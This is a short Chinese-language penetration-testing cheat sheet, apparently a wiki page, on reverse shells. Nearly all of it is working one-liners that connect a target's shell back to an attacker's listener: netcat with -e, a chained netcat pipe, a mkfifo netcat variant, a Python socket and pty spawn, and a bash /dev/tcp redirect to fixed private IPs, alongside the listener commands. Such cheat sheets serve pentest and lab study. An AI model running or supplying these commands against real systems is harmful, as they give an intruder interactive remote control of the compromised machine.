反弹Shell

nc工具（不同版本不同命令）

探测目标nc工具是否正常：nc {my_ip} 4444

┌──(kali㉿kali)-[~]
└─$ which nc
/usr/bin/nc

反弹shell：{ 方法一

nc -lnvp 4444

nc {your_ip} 4444 -e /bin/bash

方法二 nc串联

nc -lnvp 3333
nc -lnvp 4444

nc {your_ip} 3333 | /bin/bash | nc {your_ip} 4444

先跟用3333跟目标进行连接，连接后后续的指令都会通过管道，交给目标的/bin/bash进行解析，在让/bin/bash解析后的指令再次通过管道，再次通过4444 nc指令连接，并把指令发送给4444。

方法三不含-e参数

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.43.12 3333 >/tmp/f

Python反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Bash反弹shell

/bin/bash -i >& /dev/tcp/192.168.8.70/4444 0>&1

上一页有关Shell 下一页Shell升级

最后更新于1年前

这有帮助吗？